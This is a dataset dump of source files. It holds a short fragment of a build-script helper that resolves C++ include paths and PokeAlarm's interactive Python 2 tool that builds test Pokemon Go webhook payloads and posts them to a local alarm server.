relcpppaths = []
for p in cpppaths:
if not os.path.isabs(p):
node = srcnode.find_node(p)
assert node is not None, "could not find %s" % p
relcpppaths.append(node.bldpath())
else:
relcpppaths.append(p)
cpppaths = list(implicit_paths) + relcpppaths
task_gen.env["PYEXT_INCPATH"] = [
task_gen.env["PYEXT_CPPPATH_FMT"] % p
for p in cpppaths]
| bsd-3-clause | -3,239,157,631,129,578,000 | 30.310606 | 229 | 0.570893 | false |
neskk/PokeAlarm | tools/webhook_test.py | 1 | 12389 | import requests
import time
import sys
import json
import re
import os
import portalocker
import pickle
truthy = frozenset([
"yes", "Yes", "y", "Y", "true", "True", "TRUE", "YES", "1", "!0"
])
whtypes = {
"1": "pokemon",
"2": "pokestop",
"3": "gym",
"4": "egg",
"5": "raid"
}
teams = {
"0": "Uncontested",
"1": "Mystic",
"2": "Valor",
"3": "Instinct"
}
teams_formatted = re.sub('[{}",]', '', json.dumps(
teams, indent=4, sort_keys=True))
_cache = {}
_gym_info = {}
def get_image_url(image):
return \
"https://raw.githubusercontent.com/not4profit/images/master/" + image
_default_gym_info = {
"name": "unknown",
"description": "unknown",
"url": get_image_url('icons/gym_0.png')
}
def set_init(webhook_type):
payloadr = {}
current_time = time.time()
if webhook_type == whtypes["1"]:
payloadr = {
"type": "pokemon",
"message": {
"pokemon_id": 149,
"pokemon_level": 30,
"player_level": 30,
"latitude": 37.7876146,
"longitude": -122.390624,
"encounter_id": current_time,
"cp_multiplier": 0.7317000031471252,
"form": None,
"cp": 768,
"individual_attack": 10,
"individual_defense": 1,
"individual_stamina": 9,
"move_1": 281,
"move_2": 133,
"height": 0.5694651007652283,
"weight": 5.733094215393066,
"gender": 3,
"seconds_until_despawn": 1754,
"spawn_start": 2153,
"spawn_end": 3264,
"verified": False
}
}
elif webhook_type == whtypes["2"]:
payloadr = {
"type": "pokestop",
"message": {
"pokestop_id": current_time,
"enabled": "True",
"latitude": 37.7876146,
"longitude": -122.390624,
"active_fort_modifier": 0
}
}
elif webhook_type == whtypes["3"]:
payloadr = {
"type": "gym",
"message": {
"raid_active_until": 0,
"gym_id": 0,
"gym_name": "unknown",
"team_id": 3,
"slots_available": 0,
"guard_pokemon_id": 99,
"lowest_pokemon_motivation": 0.8795773983001709,
"total_cp": 11099,
"enabled": "True",
"latitude": 37.7876146,
"longitude": -122.390624
}
}
elif webhook_type == whtypes["4"]:
payloadr = {
"type": "raid",
"message": {
"gym_id": 0,
"gym_name": "unknown",
"level": 5,
"latitude": 37.7876146,
"longitude": -122.390624
}
}
elif webhook_type == whtypes["5"]:
payloadr = {
"type": "raid",
"message": {
"gym_id": 0,
"gym_name": "unknown",
"pokemon_id": 150,
"cp": 12345,
"move_1": 123,
"move_2": 123,
"level": 5,
"latitude": 37.7876146,
"longitude": -122.390624
}
}
return payloadr
def check_int(questionable_input, default):
if questionable_input.isdigit():
return int(questionable_input.lstrip("-"))
else:
print "Not a valid number. Defaulting to " + str(default)
return default
def int_or_default(input_parm):
payload["message"][input_parm] = check_int(
raw_input(), payload["message"][input_parm])
def get_gym_info(gym_id):
""" Gets the information about the gym. """
return _gym_info.get(gym_id, _default_gym_info)
def gym_or_invalid(prm, prm2):
questionable_input = raw_input()
while get_gym_info(questionable_input)['name'] == "unknown":
print "Not a valid gym. Please try again..\n>",
questionable_input = raw_input()
print "Gym found! {}".format(get_gym_info(questionable_input)['name'])
payload["message"][prm] = questionable_input
payload["message"][prm2] = get_gym_info(questionable_input)['name']
def cache_or_invalid():
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
input = raw_input()
if os.path.exists(os.path.join(path, "cache", "{}.cache".format(input))):
file = os.path.join(path, "cache", "{}.cache".format(input))
print "Valid file = {}".format(file)
elif os.path.exists(os.path.join(path, "cache", "manager_0.cache")):
file = os.path.join(path, "cache", "manager_0.cache")
print "Invalid file using default = {}".format(file)
else:
print "No valid cache file found, terminating.."
sys.exit(1)
load_cache(file)
def load_cache(file):
global _gym_info
with portalocker.Lock(file, mode="rb") as f:
data = pickle.load(f)
_gym_info = data.get('gym_info', {})
def list_cache():
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
print "Here is a list of cache files found in \cache\ :"
for file in os.listdir(os.path.join(path, "cache")):
if file.endswith(".cache"):
print file
def list_gyms():
path = os.path.dirname(os.path.abspath(__file__))
if len(_gym_info) > 50:
with portalocker.Lock(os.path.join(path, "gyms.txt"), mode="wb+") as f:
i = 0
for key in _gym_info.keys():
i += 1
name = get_gym_info(key)['name']
f.write("[{}] {} : {} \n".format(i, name, key))
f.close()
print "Find list of gyms in your \\tools\ folder (gyms.txt)"
print "Enter gym id for raid (from file)\n>",
else:
print "Here is a list of gyms found in your cache:"
i = 0
for key in _gym_info.keys():
i += 1
name = get_gym_info(key)['name']
print "[{}] {} : {} ".format(i, name, key)
print "Enter gym id for raid (from above)\n>",
def gym_cache():
print "Do you use file caching or does 'gym name' matter? (Y/N)\n>",
if raw_input() in truthy:
list_cache()
print "Enter cache file name to verify the gym (default:manager_0)\n>",
cache_or_invalid()
list_gyms()
gym_or_invalid("gym_id", "gym_name")
def reset_timers_and_encounters():
current_time = time.time()
if payload["type"] == "pokemon":
payload["message"].update({
"disappear_time": current_time + 10,
"last_modified_time": current_time,
"time_until_hidden_ms": 10000,
"encounter_id": current_time
})
elif payload["type"] == "pokestop":
payload["message"].update({
"last_modified_time": current_time,
"lure_expiration": current_time + 60,
})
elif payload["type"] == "gym":
payload["message"].update({
"last_modified": current_time,
"occupied_since": current_time - 9000
})
elif payload["type"] == "raid":
payload["message"].update({
"start": current_time + 20,
"end": current_time + 20 + 60,
})
def get_and_validate_team():
team = teams.get(raw_input(), 5)
if team == 5:
print "Team invalid, defaulting to Uncontested"
team = 0
else:
for team_id, team_name in teams.iteritems():
if team_name == team:
team = int(team_id)
payload["message"]["team_id"] = team
webhooks_formatted = re.sub('[{}",]', '', json.dumps(
whtypes, indent=4, sort_keys=True))
print "What kind of webhook would you like to send?(put in a number)\n"\
+ webhooks_formatted + ">",
type = whtypes.get(raw_input(), 0)
if type == 0:
print "Must put in valid webhook type"
sys.exit(1)
payload = set_init(type)
print "What is the URL of where you would like to send the webhook? " \
+ "(default: http://127.0.0.1:4000)\n>",
url = raw_input()
if url == '' or url.isspace():
url = "http://127.0.0.1:4000"
print "Assuming " + url + " as webhook URL"
print "Does location matter or do you use geofences? (Y/N)\n>",
if raw_input() in truthy:
regex_coordinates = re.compile("[-+]?[0-9]*\.?[0-9]*"
+ "[ \t]*,[ \t]*" + "[-+]?[0-9]*\.?[0-9]*")
print "Enter latitude,longitude (Ex. 37.7876146,-122.390624)\n>",
coordinates = raw_input()
lat = payload["message"]["latitude"]
lng = payload["message"]["longitude"]
if not regex_coordinates.match(coordinates):
print "Coordinates not valid. Defaulting to " \
+ str(lat) + ',' + str(lng)
else:
lat, lng = map(float, coordinates.split(","))
payload["message"]["latitude"] = lat
payload["message"]["longitude"] = lng
if type == whtypes["1"]:
print "Enter Pokemon ID\n>",
int_or_default("pokemon_id")
print "Gender (1-3)\n>",
int_or_default("gender")
if payload["message"]["pokemon_id"] == 201:
print "Which form of Unown would you like? (default: A)\n>",
form_character = raw_input()[0:1].upper()
if form_character == '':
print "Defaulting to A"
payload["message"]["form"] = 1
else:
form = ord(form_character)
# A-Z = 1-26, ! = 27, ? = 28
if ord('A') <= form <= ord('Z'):
form -= ord('A') - 1
elif form == 33:
# !
form = 27
elif form == 63:
# ?
form = 28
else:
print "Invalid form type. Defaulting to A"
form = 1
payload["message"]["form"] = form
print "Encounters enabled?\n>",
if raw_input() in truthy:
print "CP?\n>",
int_or_default("cp")
print "Attack IV\n>",
int_or_default("individual_attack")
print "Defense IV\n>",
int_or_default("individual_defense")
print "Stamina IV\n>",
int_or_default("individual_stamina")
print "Id of move 1\n>",
int_or_default("move_1")
print "Id of move 2\n>",
int_or_default("move_2")
if payload["message"]["pokemon_id"] == 19:
print "Count towards tiny Rattata medal?"
if raw_input() in truthy:
payload["message"]["weight"] = 2.0
if payload["message"]["pokemon_id"] == 129:
print "Count towards big Magikarp medal?"
if raw_input() in truthy:
payload["message"]["weight"] = 14.0
elif type == whtypes["3"]:
gym_cache()
print "Which team?(put in a number)\n" + teams_formatted + "\n>",
get_and_validate_team()
elif type == whtypes["4"]:
gym_cache()
print "What level of gym egg? (1-5)\n>",
egglevel = check_int(raw_input(), payload["message"]["level"])
if 6 > egglevel > 0:
payload["message"]["level"] = egglevel
else:
print "Egg level invalid. Assuming level 5"
elif type == whtypes["5"]:
gym_cache()
print "Enter pokemon id for raid\n>",
int_or_default("pokemon_id")
print "Moveset important?\n>",
if raw_input() in truthy:
print "Id of move 1\n>",
int_or_default("move_1")
print "Id of move 2\n>",
int_or_default("move_2")
reset_timers_and_encounters()
while True:
for i in range(3):
resp = requests.post(url, json=payload, timeout=5)
if resp.ok is True:
print "Notification successful. Returned code {}".format(
resp.status_code)
break
else:
print "Discord response was {}".format(resp.content)
raise requests.exceptions.RequestException(
"Response received {}, webhook not accepted.".format(
resp.status_code))
print "Attempting connection again"
print "Send again?\n>",
if raw_input() not in truthy:
break
if payload["type"] == "gym":
print "Which team? (put in number)" + teams_formatted + "\n>",
get_and_validate_team()
reset_timers_and_encounters()
| agpl-3.0 | -2,479,586,920,499,399,000 | 30.685422 | 79 | 0.514327 | false |
Subsets and Splits